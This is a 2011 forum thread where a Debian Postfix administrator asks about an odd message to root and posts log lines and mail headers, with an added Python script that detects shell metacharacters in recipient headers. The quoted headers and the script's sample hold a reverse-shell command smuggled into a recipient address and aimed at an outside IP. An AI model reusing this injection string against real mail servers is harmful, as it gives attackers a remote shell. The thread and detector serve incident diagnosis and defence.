- 02-16-2011 #1, Just Joined! (Join Date: Apr 2008; Location: Catalonia; Posts: 29)
[SOLVED] Debian mail server root mailbox received a strange message
Hello,
I administer a new production mail server under Debian GNU/Linux 5.0 lenny. The other day I installed and configured Postfix and Dovecot, with no spam filtering or virus detection tools or complements.
Today I noticed that the root mailbox has received a message from blue@dick.com. Is this some vulnerability? I'm not sure whether this represents a security problem or not.
/var/log/mail.log:
Code:
Feb 15 11:16:10 postfix/smtpd[31314]: connect from b202.blue.fastwebserver.de[62.141.42.202]
Feb 15 11:16:12 postfix/smtpd[31314]: 9AB3E11104B9: client=b202.blue.fastwebserver.de[62.141.42.202]
Feb 15 11:16:12 postfix/qmgr[30491]: 9AB3E11104B9: from=<blue@dick.com>, size=405, nrcpt=1 (queue active)
Feb 15 11:16:12 postfix/smtpd[31314]: disconnect from b202.blue.fastwebserver.de[62.141.42.202]
Thank you!!
Last edited by jordi; 02-16-2011 at 03:48 PM.
- 02-16-2011 #2, Just Joined! (Join Date: Apr 2008; Location: Catalonia; Posts: 29)
Here is the part of the expanded header:
Code:
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"@machine.example.com
- 02-16-2011 #3, Just Joined! (Join Date: Apr 2008; Location: Catalonia; Posts: 29)
It seems that only a certain version of SpamAssassin Milter Plugin is compromised.
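A defender-side check for the header pattern shown in post #2, added here as an example (not code from the thread or from any project it mentions): it flags stored messages whose X-Original-To or Delivered-To local part contains shell metacharacters. The function names, the metacharacter set and the sample messages are assumptions constructed for illustration.

```python
import email
import re

# Headers in which the delivering MTA records the envelope recipient.
RCPT_HEADERS = ("X-Original-To", "Delivered-To")

# Characters that are rare in real mailbox names but meaningful to a shell
# (assumed set; adjust for local addressing conventions).
SHELL_META = re.compile(r"[|;&$<>`\s]")


def local_part(value):
    """Return the local part of a recipient header value, quotes removed."""
    value = value.strip()
    if value.startswith('"'):
        # Quoted local part: take everything up to the closing quote.
        end = value.find('"', 1)
        return value[1:end] if end != -1 else value[1:]
    return value.strip("<>").rsplit("@", 1)[0]


def suspicious_recipients(raw_message):
    """List (header, local part) pairs whose local part has shell metacharacters."""
    msg = email.message_from_string(raw_message)
    hits = []
    for name in RCPT_HEADERS:
        for value in msg.get_all(name, []):
            lp = local_part(str(value))
            if SHELL_META.search(lp):
                hits.append((name, lp))
    return hits


# Constructed sample messages (192.0.2.10 is a documentation address).
SAMPLE_BAD = (
    'X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/45295 1>&0 2>&0"\n'
    'Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/45295 1>&0 2>&0"'
    "@machine.example.com\n"
    "From: blue@example.net\n\nbody\n"
)
SAMPLE_OK = (
    "X-Original-To: root@machine.example.com\n"
    "Delivered-To: root+logs@machine.example.com\n"
    "From: cron@machine.example.com\n\nbody\n"
)

if __name__ == "__main__":
    for label, raw in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(label, suspicious_recipients(raw))
```

A hit only shows that such a recipient string reached the mailbox; whether anything was executed depends on the software that handled the address before delivery.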



